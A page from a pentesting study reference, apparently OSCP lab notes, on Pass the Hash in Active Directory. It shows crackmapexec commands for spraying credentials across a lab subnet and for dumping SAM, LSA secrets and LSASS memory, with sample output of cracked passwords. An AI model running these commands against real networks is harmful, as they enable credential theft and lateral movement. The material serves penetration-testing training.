Pentesting Quick Reference OSCP and Beyond
  • Basic Tools & Techniques
  • Linux Basics
  • Windows Basics
  • Shells
  • Uploading Shells/ Transferring Files
  • FootPrinting
  • Host Discovery
  • Scanning
  • Vulnerability assessment
  • Metasploit and Meterpreter
    • Payloads
  • Brute Forcing/ Password Cracking
    • Attacking LSASS Passwords
    • Credentials Hunting Windows
    • Credential Hunting in Linux
    • Passwd, Shadow & Opasswd
    • Pass the Hash (PtH)
    • Protected Files
    • Protected Archives
    • Password Policies
    • Password Managers
    • Breached Credentials
  • Linux Remote Management Protocols
  • Windows Remote Management Protocols
  • Port 20/21 - FTP Pentesting
  • Port 23 Telnet
  • Port 25 - SMTP
  • IMAP/ POP3
  • Port 53 DNS
  • Port 445 - SMB
  • Port 111 -RPC Bind
  • Port 135 - RPC
  • Port 137 NetBios
  • Port 161 SNMP
  • Port 1433 - MSSQL
  • Port 1521 Oracle TNS
  • Port 1833 - MQTT
  • Port 2049 - NFS
  • Port 3306 MySQL
  • Port 3389 - RDP
  • Port 5985 - Winrm
  • Port 632 (UDP) IPMI
  • Redis (6379)
  • Port 10000 Webmin
  • Privilege Escalation
    • Windows Priv esc
    • Linux Priv esc
  • Active Directory
    • AD Basics
      • AD Management Basics
    • Initial Enumeration of AD
      • Enumerating AD Users
    • Password Spraying
      • Enumerating & Retrieving Password Policies
      • Password Spraying - Making a Target User List
      • Internal Password Spraying - from Linux
      • Internal Password Spraying - from Windows
      • Enumerating Security Controls
    • LLMNR Poisoning
    • SMB/ NTLM Relay Attacks
    • IPv6 Attacks
      • IPV6 DNS takeover
      • WPAD
    • Passback Attacks
    • AD Shell
    • AD Enumeration
      • Credentialed Enumeration - from Linux
      • Credentialed Enumeration - from Windows
      • Living off the Land
      • BloodHound
      • Plumhound
      • Bloodhound CE
      • ldapdomaindump
      • PingCastle
    • Post Compromise
      • Pass Attacks
        • Pass the Hash
        • Pass the Ticket
          • Pass the Ticket (PtT) from Windows
          • Pass the Ticket (PtT) from Linux
    • AS-REP roasting
    • Kerberosting
      • Kerberos "Double Hop" Problem
    • Access Control List (ACL) Abuse Primer
      • ACL Enumeration
      • ACL Abuse Tactics
      • DCSync
        • DCSync Example Forest HTB
    • Privilege Escaltion
    • Bleeding Edge Vulnerabilities
    • Miscellaneous Misconfigurations
    • Attacking Active Directory & NTDS.dit 1
    • Domain Trusts
      • Attacking Domain Trusts - Child -> Parent Trusts - from Windows
      • Attacking Domain Trusts - Child -> Parent Trusts - from Linux
      • Attacking Domain Trusts - Cross-Forest Trust Abuse - from Windows
      • Attacking Domain Trusts - Cross-Forest Trust Abuse - from Linux
    • Hardening Active Directory
    • Additional AD Auditing Techniques
    • HTB AD Enumeration & Attacks - Skills Assessment Part I
  • Web Pentesting
    • Subdomains, directories and Vhost listing
    • Command Injection
    • XSS
    • SQL Injection
    • Authentication Bypass
  • Cryptography
  • More Resources
  • Forensics
  • IoT Security
  • API Security
  • Binary Exploitation
    • Assembly Cheatsheat for Hackers
    • Malware Analysis
      • Basic Static Malware Analysis
  • Boxes/ Machines
    • Try Hack Me
      • Vulnversity
      • Basic Pentesting
      • Kenobi
      • Steel Mountain
    • Vulnhub
      • Tiki
    • HTB
      • Beep
      • Active
      • Forest
      • Devel
    • Metasploitable 2
    • PWN.COLLEGE Talking Web
    • PWN COLLGE Web Hacking
  • Private Challenges
    • Pwn
    • Forensics
  • Misc tools
    • NetExec
  • SOC Analyst Resources
  • OSCP Tips and Misc
  • Mobile Hacking
  • Buffer Overflow
  • Wordpress
  • Web3 and Blockchain Security
  • WIFI Hacking
    • WPS Hacking
    • Misc Tools
Powered by GitBook
On this page
  • How to get the hash
  • Crackmapexec PTH
  • Capabilities of crackmapexec
  • CrackMapExec database
  1. Active Directory
  2. Post Compromise
  3. Pass Attacks

Pass the Hash

PreviousPass AttacksNextPass the Ticket

Last updated 23 hours ago

We can use the password or hash to move literally in the network.

How to get the hash

Metasploit Hashdump

Impacket

Crackmapexec PTH

We can pass a password

┌──(kali㉿kali)-[~]
└─$ crackmapexec smb 192.168.145.0/24 -u fcastle -d MARVEL.local -p Password1
SMB         192.168.145.138 445    HYDRA-DC         [*] Windows Server 2022 Build 20348 x64 (name:HYDRA-DC) (domain:MARVEL.local) (signing:True) (SMBv1:False)
SMB         192.168.145.140 445    SPIDERMAN        [*] Windows 10 / Server 2019 Build 19041 x64 (name:SPIDERMAN) (domain:MARVEL.local) (signing:False) (SMBv1:False)
SMB         192.168.145.139 445    THEPUNISHER      [*] Windows 10 / Server 2019 Build 19041 x64 (name:THEPUNISHER) (domain:MARVEL.local) (signing:False) (SMBv1:False)
SMB         192.168.145.138 445    HYDRA-DC         [+] MARVEL.local\fcastle:Password1 
SMB         192.168.145.140 445    SPIDERMAN        [+] MARVEL.local\fcastle:Password1 (Pwn3d!)
SMB         192.168.145.139 445    THEPUNISHER      [+] MARVEL.local\fcastle:Password1 (Pwn3d!)

or We can pass a hash (Works only on NTLM v1 . V2 can be relayed not passed)

Capabilities of crackmapexec

We can dump SAM, LSA or smbshares

crackmapexec smb <target_ip> -u Administrator -p <password> --sam --local-auth
crackmapexec smb <target_ip> -u Administrator -p <password> --lsa --local-auth
crackmapexec smb <target_ip> -u Administrator -p <password> --shares --local-auth

Dumping Memory

crackmapexec smb <target_ip> -u <username> -p <password> -M lsassy -o METHOD=nanodump

🔍 --lsa in CrackMapExec

Purpose: Dumps LSA secrets from the registry, such as:

  • Stored service account passwords

  • Cached domain credentials

  • Auto-logon passwords

  • Scheduled task creds

Mechanism: This is a registry read, not a memory dump. It does not touch LSASS directly.

Command Example:

bashCopyEditcrackmapexec smb <target_ip> -u <username> -p <password> --lsa

Requires:

  • Administrator privileges

  • Access to registry remotely

Output Example:

textCopyEdit[+] LSA Secrets:
    - DefaultPassword = P@ssw0rd123
    - Scheduled task: \MyTask -> user: svc_account, password: Welcome1!

🧠 -M lsassy Module

Purpose: Dumps live credentials from LSASS memory, including:

  • Cleartext passwords

  • NTLM hashes

  • Kerberos tickets

Mechanism: Runs a memory dump using a method like procdump, comsvcs, or nanodump, then parses it using lsassy.

Command Example:

bashCopyEditcrackmapexec smb <target_ip> -u <username> -p <password> -M lsassy

Requires:

  • Administrator privileges

  • Ability to execute dump remotely

  • AV/EDR may block it

Output Example:

textCopyEdit[+] msv : user1 @ WORKSTATION (domain: WORKGROUP) => password: Summer2024!
[+] wdigest : admin @ DOMAIN.LOCAL => password: SuperSecretPass

CrackMapExec database

Keeps record of all cracked user accounts

cmedb

Pass the Hash (PtH) | Pentesting Quick Reference OSCP and Beyond
Complete Tutorial
Logo